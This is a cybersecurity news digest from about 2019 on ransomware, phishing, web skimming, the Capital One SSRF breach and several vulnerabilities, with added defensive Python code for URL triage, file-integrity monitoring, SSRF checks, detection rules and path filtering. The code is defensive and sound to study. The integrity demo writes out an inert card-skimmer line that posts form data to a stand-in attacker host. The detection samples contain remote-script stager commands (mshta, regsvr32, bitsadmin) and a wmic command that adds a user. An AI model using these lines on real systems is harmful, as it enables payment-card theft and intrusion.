FFIEC Encourages Standardized Approach to Assessing Cybersecurity Preparedness

On Wednesday, August 28, the FFIEC released a press statement encouraging the use of a "standardized approach to assess and improve cybersecurity preparedness." Firms that adopt a standardized approach are better able to track their progress and share best practices with other institutions and regulators, and the FFIEC welcomes such collaborative approaches because they help advance the effectiveness of the supervisory process. As stated in the press release, tools that can be used for standardization include the "FFIEC Cybersecurity Assessment Tool, the National Institute of Standards and Technology Cybersecurity Framework, the Financial Services Sector Coordinating Council Cybersecurity Profile, and the Center for Internet Security Critical Security Controls."

Relevant URL(s): https://www.ffiec.gov/press/pr082819.htm

Ransomware Attack Cripples at Least 20 Local Texas Agencies, State Government Says

The Texas Department of Information Resources announced that a coordinated ransomware attack took down at least 20 local government entities across the state. It did not disclose which agencies or jurisdictions were affected, nor any information about the ransom demanded. Ransomware attacks on cities have grown over the last couple of years, and Texas is far from the first state to experience one. Regarding ransomware in general, the FBI estimates that "more than 4,000 ransomware attacks have taken place every day since January 1, 2016, marking a 300-percent increase over the roughly 1,000 estimated daily attacks in 2015." Organizations are urged to document their response procedures and to train employees on how to react in the event of a ransomware compromise.

Relevant URL(s): https://www.foxnews.com/tech/ransomware-attack-texas-government-agencies

Financial Phishing Grows in Volume and Sophistication in First Half of 2019

Criminals are getting better and more active at phishing, especially with pages that impersonate a financial institution's website. They now also obtain certificates from certificate authorities (CAs), so the illegitimate site shows the browser padlock that once gave users a sense of safety; the padlock only means the connection to that hostname is encrypted and the certificate matches the hostname, not that the hostname belongs to the bank. Bob Maley, Chief Security Officer at Normshield, said, "free CAs like LetsEncrypt have helped small organizations but with significant unintended consequences. The shift to using domains with certificates changes the game." Users are advised to check that the URL is one the legitimate business actually uses for transactions, rather than trusting the padlock, and to be vigilant when visiting websites.
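
An added example, not code from the Dark Reading article or from Normshield: a URL triage routine that ignores the padlock entirely and judges the registrable domain against the hostnames the institution really uses. The bank names, the allow-list and the miniature public-suffix table are assumptions constructed for the example; a real deployment would use the full Public Suffix List and the bank's own asset inventory.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed allow-list for this example: the hostnames the institution
# actually uses for customer transactions (assumption, not a real bank).
LEGIT_DOMAINS = {"examplebank.com", "examplebank.co.uk"}

# Tiny stand-in for the Public Suffix List so the example runs offline;
# production code should use the full list (e.g. the publicsuffix2 package).
PUBLIC_SUFFIXES = {"com", "net", "org", "uk", "co.uk"}


def registrable_domain(host):
    """'login.examplebank.co.uk' -> 'examplebank.co.uk'; None if host is only a suffix."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:  # longest suffix wins (smallest i)
            return None if i == 0 else ".".join(labels[i - 1:])
    return None


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character swaps such as examp1ebank."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url):
    """Verdict for a URL. https:// and a valid certificate play no part in the
    decision: a domain-validated certificate is obtainable for every host below."""
    host = urlsplit(url).hostname or ""
    if not host:
        return "invalid"
    try:
        ipaddress.ip_address(host)
        return "ip-host"  # banks do not serve logins from bare IP addresses
    except ValueError:
        pass
    domain = registrable_domain(host)
    if domain in LEGIT_DOMAINS:
        return "legitimate"
    dotted = "." + host + "."
    for legit in LEGIT_DOMAINS:
        if "." + legit + "." in dotted:
            return "brand-in-subdomain"  # examplebank.com.secure-login.net
    if domain:
        label = domain.split(".")[0]
        for legit in LEGIT_DOMAINS:
            legit_label = legit.split(".")[0]
            if legit_label in label or edit_distance(label, legit_label) <= 2:
                return "lookalike"  # examp1ebank.com, examplebank-verify.com
    return "unknown"
```

The brand-in-subdomain case is the one a green padlock hides best: `https://examplebank.com.secure-login.net/` is a perfectly valid certificate for `secure-login.net`, and nothing in the TLS handshake says otherwise.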

Relevant URL(s): https://www.darkreading.com/attacks-breaches/financial-phishing-grows-in-volume-and-sophistication-in-first-half-of-2019/d/d-id/1335528

Online Skimming: An Emerging Threat that Requires Urgent Awareness and Attention

Web-based skimming is a growing threat that every online service provider should be aware of. Using JavaScript "sniffers", attackers inject malicious code into a website that "skims" payment-card data as shoppers type it into a checkout form, without the merchant or the consumer noticing. The attacks are highly effective and hard to spot after the fact, because the site keeps working normally. Attackers use a variety of methods to gain access and inject code, and they diversify their victims by targeting both e-commerce sites directly and the third-party software libraries that merchants load. Merchants are strongly advised to run regular vulnerability assessments of their web applications, both internal and external, and to use file-integrity monitoring so that changes to the scripts they serve are detected.
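
An added example, not code from the Help Net Security article: the file-integrity check the article recommends, alongside the Subresource Integrity (SRI) hash that pins a third-party library so the browser refuses to run it if its host starts serving altered code. The web root, the file names and the inert skimmer snippet are constructed for the demonstration.

```python
import base64
import hashlib
import os
import shutil
import tempfile

MONITORED = (".js", ".html", ".php")  # file types a skimmer lands in


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """relative path -> sha256 for every monitored file under root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(MONITORED):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                baseline[rel] = sha256_file(full)
    return baseline


def compare(old, new):
    """What changed between two baselines. Anything in 'added' or 'modified'
    that was not part of a known deployment is a skimmer candidate."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def sri_hash(body, algo="sha384"):
    """Subresource Integrity value for a script body, for use as
    <script src=... integrity="sha384-..." crossorigin="anonymous">."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def demo():
    """Constructed scenario: baseline a fake web root, append a Magecart-style
    form hook to the checkout script, and detect it. Returns compare()'s result."""
    root = tempfile.mkdtemp()
    try:
        os.makedirs(os.path.join(root, "js"))
        checkout = os.path.join(root, "js", "checkout.js")
        with open(checkout, "w") as f:
            f.write("function pay(form) { /* legitimate checkout code */ }\n")
        with open(os.path.join(root, "index.html"), "w") as f:
            f.write("<html><body><form id='pay'></form></body></html>\n")
        before = build_baseline(root)
        # Simulated skimmer (constructed, inert): serialise the payment form on
        # submit and POST it to an attacker-controlled host.
        with open(checkout, "a") as f:
            f.write("document.forms[0].addEventListener('submit', e => fetch("
                    "'https://collect.attacker.invalid/c', {method: 'POST', "
                    "body: JSON.stringify(Object.fromEntries(new FormData(e.target)))}));\n")
        after = build_baseline(root)
        return compare(before, after)
    finally:
        shutil.rmtree(root)
```

The baseline must be taken from a known-good deployment artifact, not from the live server after the fact, and the comparison should run from a host the web server cannot write to; a skimmer that can edit `checkout.js` can just as easily edit a baseline stored beside it. SRI covers the third-party-library route (a pinned hash breaks the page rather than silently running replaced code), but it does nothing for scripts injected into the merchant's own files, which is what the integrity check is for.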

Relevant URL(s): https://www.helpnetsecurity.com/2019/08/06/online-skimming/

What We Can Learn From the Capital One Hack

The Capital One breach was initially portrayed by many as a zero-day or insider attack, but the investigation showed that the attacker used a well-known technique, Server-Side Request Forgery (SSRF). A misconfigured Web Application Firewall (WAF) that Capital One ran on Amazon Web Services (AWS) could be tricked into making requests on the attacker's behalf and relaying the responses, including the temporary credentials of the IAM role attached to the WAF's instance, which the EC2 instance metadata service hands to any process on that instance that asks. What can be done with credentials obtained this way is bounded by the role's permissions; in Capital One's case those permissions were broad enough to let the attacker read the contents of files in cloud storage that should never have been reachable from the WAF. Evan Johnson, manager of the product security team at Cloudflare, wrote that "SSRF has become the most serious vulnerability facing organizations that use public clouds." He also stated that "The impact of SSRF is being worsened by the offering of public clouds, and the major players like AWS are not doing anything to fix it. The problem is common and well-known, but hard to prevent and does not have any mitigations built into the AWS platform."
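
The defensive half of the story, as an added example that is not code from Krebs, Capital One or Cloudflare: the target check a proxy or "fetch this URL" feature should apply before making a request. It resolves the hostname once and rejects anything that lands on a non-public address, including the link-local 169.254.169.254 metadata endpoint in its dotted, plain-integer and IPv4-mapped IPv6 spellings. The hostnames, resolver stubs and addresses are assumptions for the example. One caveat outside the article: AWS later introduced IMDSv2, which requires a session token obtained with a PUT request and so defeats the GET-only SSRF described above, but it has to be enforced per instance rather than being on by default for existing ones.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def host_to_ip(host, resolve):
    """Turn the URL host into one address, handling the numeric spellings an
    attacker uses to slip past string checks ('2852039166' is 169.254.169.254)."""
    try:
        return ipaddress.ip_address(host)        # dotted IPv4 or IPv6 literal
    except ValueError:
        pass
    if host.isdigit():
        return ipaddress.ip_address(int(host))   # plain-integer IPv4
    return ipaddress.ip_address(resolve(host))   # DNS name (hex/octal forms end up here too)


def check_target(url, resolve=socket.gethostbyname):
    """Return (ok, detail). On success, detail is the vetted IP: the caller must
    connect to that IP rather than resolving the name a second time, otherwise
    a DNS-rebinding attacker can answer the second lookup with 169.254.169.254."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError as exc:
        return False, f"bad port: {exc}"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        ip = host_to_ip(host, resolve)
    except (ValueError, OSError) as exc:
        return False, f"unresolvable host {host!r}: {exc}"
    mapped = getattr(ip, "ipv4_mapped", None)    # ::ffff:169.254.169.254
    if mapped is not None:
        ip = mapped
    if not ip.is_global:
        # is_global is False for link-local (169.254.0.0/16, which includes the
        # metadata service), RFC 1918, loopback, CGNAT, multicast and reserved space
        return False, f"{host} resolves to non-public address {ip}"
    return True, str(ip)
```

Two things the check cannot do on its own: it must be re-applied to every redirect hop (or redirects disabled), since a public host can 302 to the metadata address, and it does not shrink what the credentials can do once stolen; the instance role behind a WAF should have no storage permissions at all.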

Relevant URL(s): https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/

US Company Selling Weaponized BlueKeep Exploit

On May 14, 2019, Microsoft released patches for BlueKeep (CVE-2019-0708), a pre-authentication flaw in Remote Desktop Services, and described it as a “wormable vulnerability that could self-propagate similarly to how the EternalBlue helped propagate the WannaCry ransomware outbreak.” On Tuesday, July 23, Immunity, Inc. announced that it was shipping a working BlueKeep exploit in CANVAS v7.23, the company’s penetration-testing toolkit. Microsoft, the US National Security Agency (NSA), Germany’s BSI, the Australian Cyber Security Centre, the US Department of Homeland Security, and the UK’s National Cyber Security Centre have all issued warnings urging users to patch the vulnerability on older versions of Windows (Windows 7, Windows Server 2008 and 2008 R2, and the out-of-support Windows XP and Server 2003, for which Microsoft made an exceptional fix available). Anyone who has not yet patched should do so as soon as possible; where patching must wait, enabling Network Level Authentication (NLA) and keeping RDP off the internet reduce the exposure, but NLA only blocks unauthenticated exploitation and is not a substitute for the patch.

Relevant URL(s): https://www.zdnet.com/article/us-company-selling-weaponized-bluekeep-exploit/

Attackers Abuse XSS Vulnerability in WordPress Plugin to Display Malverts

The WordPress ‘Coming Soon Page and Maintenance Mode’ plugin, in versions 1.7.8 and below, has a stored cross-site scripting (XSS) flaw that lets attackers inject HTML or JavaScript. The injected code lands in the blog’s front end and redirects visitors through pop-up ads. The researchers who discovered the flaw said, “The eventual destination sites vary in scope and intent. Some redirects land users on typical illegitimate ads for pharmaceuticals and pornography, while others attempt to direct malicious activity against the user’s browser.” Version 1.7.9 fixes the flaw and WordPress users are urged to update immediately. Updating stops new injections but does not remove code an attacker has already stored, so site owners should also inspect the plugin’s saved settings and the rendered page source for unfamiliar script tags or redirects.

Relevant URL(s): https://cyware.com/news/attackers-abuse-xss-vulnerability-in-wordpress-plugin-to-display-malverts-1a533b02

QuickBooks Cloud Hosting Firm iNSYNQ Hit

On July 16, 2019, iNSYNQ’s network went offline due to a ransomware attack that left customers of the cloud hosting provider unable to access their accounting data. “The attack impacted data belonging to certain iNSYNQ clients, rendering such data inaccessible,” the company said. “As soon as iNSYNQ discovered the attack, iNSYNQ took steps to contain it. This included turning off some servers in the iNSYNQ environment.” With ransomware attacks on the rise, organizations are urged to verify and test their preventative and detective controls, to keep backups that the ransomware cannot reach from the production network, and to maintain a rehearsed response plan for the event of an incident.

Relevant URL(s): https://krebsonsecurity.com/2019/07/quickbooks-cloud-hosting-firm-insynq-hit-in-ransomware-attack/

8 Legit Tools and Utilities That Cybercriminals Commonly Misuse

Cybercriminals have long used legitimate tools and utilities for malicious ends, but Positive Technologies has recently observed a substantial increase in “living-off-the-land” tactics. The reason is simple: activity carried out with legitimate tools blends into legitimate traffic and routine administrative noise. “Threat actors increasingly leverage dual-use tools or tools that are already preinstalled on targeted systems to carry out cyberattacks,” said Fortinet. The eight most commonly abused tools are Cobalt Strike and Metasploit Pro, PowerShell, Windows Sysinternals, VNC, Windows Management Instrumentation (WMI), Mimikatz, TeamViewer, and trusted system executables.

Relevant URL(s): https://www.darkreading.com/attacks-breaches/8-legit-tools-and-utilities-that-cybercriminals-commonly-misuse/d/d-id/1335254

Open Source Hacking Tool Grows Up

Koadic, an open source post-exploitation tool that nation-state hacking teams from Iran, Russia, and China have used to evade detection, was recently updated with features that let attacks spread and persist more efficiently. Its creator, Sean Dillon, released the tool at DEF CON a couple of years ago; the new version can extract intelligence about the target’s environment, move laterally across a network, and scrape credentials. “It’s much more efficient now. It can be used to compromise entire networks in a matter of minutes,” said Dillon. The updates were shown at Black Hat USA Arsenal in Las Vegas. Because Koadic runs inside Windows’ own script hosts rather than dropping a conventional executable, organizations are encouraged to make sure behaviour-based detection is enabled rather than relying on file signatures alone.
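
An added example, not code from Positive Technologies, Fortinet or the Koadic project, serving both this item and the living-off-the-land tools item above: behaviour rules over process-creation telemetry that flag the ways these tools typically show up, such as encoded or hidden-window PowerShell, remote WMI process creation, an Office application spawning a shell, and the mshta, regsvr32 and rundll32 script-host launches that Koadic’s stagers are known to use. The events are constructed samples in Sysmon-style fields (Event ID 1 shape), not real telemetry, and the rule set is a starting point rather than complete coverage.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 / EDR style).
# These are made-up samples for the example, not real logs.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.5/a.hta"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";GetObject("script:http://203.0.113.5/r.sct")'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": 'wmic.exe /node:fileserver01 process call create "cmd.exe /c net user backup P@ss /add"'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c start /b bitsadmin /transfer j http://203.0.113.5/p.exe %TEMP%\\p.exe"},
    # benign: a scheduled backup script; must not fire (note -ExecutionPolicy, not -enc)
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _has(pattern, text):
    return re.search(pattern, text) is not None


# Each rule sees normalised fields: basenames lower-cased, cmdline lower-cased.
RULES = [
    ("encoded-or-hidden-powershell", lambda e: e["image"] == "powershell.exe" and (
        _has(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", e["cmdline"])
        or _has(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", e["cmdline"]))),
    ("mshta-remote-or-inline-script", lambda e: e["image"] == "mshta.exe"
        and _has(r"https?://|javascript:|vbscript:", e["cmdline"])),
    ("regsvr32-scriptlet", lambda e: e["image"] == "regsvr32.exe"
        and ("scrobj.dll" in e["cmdline"] or _has(r"/i:https?://", e["cmdline"]))),
    ("rundll32-inline-script", lambda e: e["image"] == "rundll32.exe"
        and _has(r"javascript:|vbscript:", e["cmdline"])),
    ("wmic-remote-process-create", lambda e: e["image"] == "wmic.exe"
        and _has(r"process\s+call\s+create", e["cmdline"])),
    ("office-spawns-shell", lambda e: e["parent"] in OFFICE and e["image"] in SHELLS),
]


def detect(events):
    """Return [(event_index, rule_name)] for every event that matches a rule."""
    hits = []
    for i, ev in enumerate(events):
        norm = {"parent": _basename(ev["parent"]),
                "image": _basename(ev["image"]),
                "cmdline": ev["cmdline"].lower()}
        for name, pred in RULES:
            if pred(norm):
                hits.append((i, name))
    return hits
```

None of these rules needs a file hash, which is the point: the binaries involved are all Microsoft-signed. The parent/child and command-line context is what separates the backup script from the stager, so the telemetry source has to record the full command line and the parent image, not just the process name.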

Relevant URL(s): https://www.darkreading.com/attacks-breaches/open-source-hacking-tool-grows-up/d/d-id/1335296

Customers of 3 MSPs Hit in Ransomware Attacks

Ransomware recently hit customers of three managed services providers (MSPs) after attackers obtained access to the remote monitoring and management tools the MSPs use to administer client systems. The two tools abused for remote management and ransomware deployment were the Webroot management console and Kaseya VSA. The vendors said stolen credentials were likely used to access their tools at the MSP locations; what isn't clear is how the attackers got into the Webroot console. Kyle Hanslovan of Huntress Labs said, 'We've yet to see anything that would suggest the issue is a global Webroot vulnerability.' John Durant, CTO at Kaseya, said, 'We continue to urge customers to employ best practices around securing their credentials, regularly rotating passwords, and strengthening their security hygiene.' For an MSP the practical check is whether every login to its management consoles, including vendor and API access, requires multi-factor authentication, since a console that can push software to every client is the ideal ransomware distribution point.

Relevant URL(s): https://www.darkreading.com/attacks-breaches/customers-of-3-msps-hit-in-ransomware-attacks/d/d-id/1335025

Vulnerability in SymCrypt Could Allow an Attacker to Perform DoS on any Windows Server

Tavis Ormandy, a researcher at Google Project Zero, found a vulnerability in Microsoft's SymCrypt, the core cryptographic library in Windows, that attackers could use to cause a denial of service (DoS). He demonstrated it with a specially crafted X.509 certificate whose verification never completes: 'The vulnerability could cause an infinite loop when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric,' Ormandy said. Because the same routine is used by every Windows component that verifies certificates, a single malformed certificate delivered, for example, in a TLS handshake or an S/MIME message can hang the process that parses it. There is currently no patch, but Microsoft has stated that the fix will ship in the July security updates (the issue was subsequently tracked as CVE-2019-0865).

Relevant URL(s): https://cyware.com/news/vulnerability-in-symcrypt-could-allow-an-attacker-to-perform-dos-on-any-windows-server-478abe66

Instant Fraud: Consumers See Funds Disappear in Zelle Account Scam

Zelle, a popular digital payment service embedded in many banking apps, is being abused by attackers to drain personal checking and savings accounts. All it takes is a spoofed call that appears to come from the victim's bank: the victim is socially engineered into reading back the Zelle authorization code (the one-time code the bank sends to confirm a login or transfer), which the attacker then uses to complete their own log-in attempt. Zelle is attractive to attackers because it sits inside the banking app, already connected to the user's account, which gives direct access to the victim's funds. A code the bank sends should only ever be typed into the bank's own app, never read out to a caller.

Relevant URL(s): https://www.nbcnews.com/business/consumer/instant-fraud-consumers-see-funds-disappear-zelle-account-scam-n1015736

Criminals Sell Hacker Toolkits for BofA on Dark Web

Michael McGuire, a criminology professor at the University of Surrey, posed as a buyer on the dark web and found organized crime groups selling unauthorized network access to financial organizations. One group was selling fraudulent web pages, specific to Bank of America, that let a buyer phish the bank's customers and harvest their data; the toolkit and tutorial were on offer for $11. Other companies being targeted include AT&T and Verizon. McGuire said that "if they were not already doing so, corporate cybersecurity teams ought to spend time monitoring the dark web to pick up signs of potential threats, such as data from their organizations already for sale or rogue employees willing to sell network access to others."

Relevant URL(s): https://www.americanbanker.com/articles/criminals-sell-hacker-toolkits-for-bofa-on-dark-web-study-finds?tag=00000154-4da2-d45e-a175-6fbf03b40000

Financial Sector Under Siege

Cybercrime in the financial sector is as prominent as it has ever been and continues to grow. Financial institutions face adversaries that range in size and sophistication from individuals to nation-states. Their methods are increasingly damaging and are executed with precise timing: attackers wait for an organization to launch a new program or service that has not been thoroughly vetted for security, then use it to gain a foothold in the victim's environment. As new technologies emerge and banking continues to move into the digital era, institutions should keep security at the forefront of every initiative so that all assets under their control remain secure.

Relevant URL(s): https://www.darkreading.com/cloud/financial-sector-under-siege/a/d-id/1334725

'GozNym' Banking Malware Gang Dismantled by International Law Enforcement

Law enforcement agencies across six countries have dismantled the group responsible for the GozNym banking malware, arresting several of its members. The countries that worked together to bring the group down were Bulgaria, Germany, Georgia, Moldova, Ukraine, and the United States. GozNym, a hybrid of the Gozi ISFB and Nymaim malware families, was used to steal over $100 million from more than 41,000 victims, predominantly in the United States and Europe. Earlier this month, an indictment unsealed in U.S. federal court charged the defendants with conspiracy to commit computer fraud, conspiracy to commit wire fraud and bank fraud, and conspiracy to commit money laundering.

Relevant URL(s): https://thehackernews.com/2019/05/GozNym-banking-malware.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&_m=3n.009a.1989.nk0ao093p4.18do

Flaw Affecting Millions of Cisco Devices Let Attackers Implant Persistent Backdoor

Thrangrycat, a newly disclosed vulnerability in Cisco routers, switches, and firewalls, lets attackers install a persistent backdoor. It is tracked as CVE-2019-1649 and was discovered by researchers at Red Balloon Security. It affects Cisco products that implement the Trust Anchor module (TAm), the hardware root of trust on Cisco enterprise devices that verifies that the firmware running on the platform is authentic and unmodified; the flaw lets an attacker who already has root on the device modify the FPGA bitstream that implements the TAm, so the anchor itself can be altered. "By chaining Thrangrycat and remote command injection vulnerabilities, an attacker can remotely and persistently bypass Cisco's secure boot mechanism and lock out all future software updates to the TAm," the researchers said. Further details are expected at Black Hat USA in August.

Relevant URL(s): https://thehackernews.com/2019/05/cisco-secure-boot-bypass.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&_m=3n.009a.1986.nk0ao093p4.18av

New Class of CPU Flaws Affect Almost Every Intel Processor Since 2011

Earlier this month, researchers disclosed a new class of vulnerability affecting almost every Intel processor since 2011, including the chips used by Apple. It is a speculative-execution side channel that leaks data in flight through the CPU's internal buffers (store buffers, fill buffers and load ports), so system and user-level secrets such as disk-encryption keys and passwords can be read across privilege boundaries if the attack is executed properly. The attack family, Microarchitectural Data Sampling (MDS), covers four related flaws (CVE-2018-12126, CVE-2018-12127, CVE-2018-12130 and CVE-2019-11091). Intel has released microcode updates (MCUs) for MDS, and users are urged to apply them as soon as possible; the microcode is only effective together with the matching operating system update, and full protection on affected parts may require disabling hyper-threading (SMT). On Linux, the kernel reports the current mitigation state in /sys/devices/system/cpu/vulnerabilities/mds.

Relevant URL(s): https://thehackernews.com/2019/05/intel-processor-vulnerabilities.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&_m=3n.009a.1989.nk0ao093p4.18e0

Open Banking Establishes New Access to Banks’ Networks, Creating Additional Security Issues

Financial organizations are having to balance security against usability as they work to maintain and strengthen consumer trust. Open banking has created a shift in which each organization now has an ecosystem of partners whose security it must also assure. “Security is only as good as the weakest link in the network of ecosystem partners, and the global trend toward open banking is increasing the spiderweb of interconnectivity among banks and third parties — creating additional points of weakness and vulnerability in banks’ network security,” said Alan McIntyre, global head of Accenture’s Banking practice. As open banking continues to grow and evolve, financial organizations are urged to verify the security of a prospective partner before granting it access to organizational data, and to scope that access (API credentials, data fields and rate limits) to what the partner actually needs.

Relevant URL(s): https://www.helpnetsecurity.com/2019/05/08/open-banking-security-issues/

Researchers Flag New Oracle WebLogic Zero-Day RCE Flaw

All versions of Oracle WebLogic Server are vulnerable to an unauthenticated remote code execution flaw in its wls9_async and wls-wsat web services. At the time of the report no CVE had been assigned; Oracle had been alerted, and the flaw was tracked as CNVD-C-2019-48814 (it was later assigned CVE-2019-2725, and Oracle issued an out-of-band patch). There are tens of thousands of WebLogic servers exposed worldwide, most of them in the US and China, and attackers have used compromised WebLogic servers for covert cryptomining. Until the patch is applied, administrators are urged to delete wls9_async_response.war and wls-wsat.war and restart the WebLogic service, or to block the /_async/* and /wls-wsat/* URL paths with an access-control policy. Path blocking has to be applied to the canonicalised request path rather than the raw request line, and should be treated as a stopgap, not a fix.
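
An added example, not code from the Help Net Security article or from Oracle: the URL-path block the article suggests, written so that the comparison happens on a canonicalised path. Naive prefix matching on the raw request string is bypassed by doubled slashes, percent-encoded underscores (single or double encoded), '..' segments and ';' matrix parameters. The request paths in the test are constructed; the function is a generic front-end filter, not a WebLogic-specific rule set.

```python
import posixpath
import re
from urllib.parse import unquote

# Context roots of the two web services the advisory says to remove. A request
# whose first path segment lands here is rejected before it reaches WebLogic.
BLOCKED_ROOTS = {"_async", "wls-wsat"}


def normalize_path(raw):
    """Canonical form of a request path: drops query/fragment, percent-decodes
    twice (double encoding), strips ';param' matrix parameters from each
    segment, folds backslashes and repeated slashes, and collapses '.' and
    '..' segments. Lower-cases the result, which is deliberately conservative."""
    path = raw.split("?", 1)[0].split("#", 1)[0]
    for _ in range(2):
        path = unquote(path)
    path = path.replace("\\", "/")
    path = re.sub(r"/+", "/", path)          # '//_async' would otherwise survive normpath
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    path = posixpath.normpath("/".join(segments))
    if not path.startswith("/"):
        path = "/" + path
    return path.lower()


def is_blocked(raw_path):
    """True if the request, after canonicalisation, targets a blocked context root."""
    return normalize_path(raw_path).split("/")[1] in BLOCKED_ROOTS
```

Matching on the first segment rather than a string prefix is what makes `/_async` (no trailing slash) and `/_async/../_async/x` both land in the deny set while `/myapp/_async/x`, which belongs to a different context root, does not. Whatever enforces this must sit in front of WebLogic and must be the only path in; a block on one load balancer does nothing for a second listener that reaches the same servlet container.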

Relevant URL(s): https://www.helpnetsecurity.com/2019/04/25/oracle-weblogic-zero-day-rce/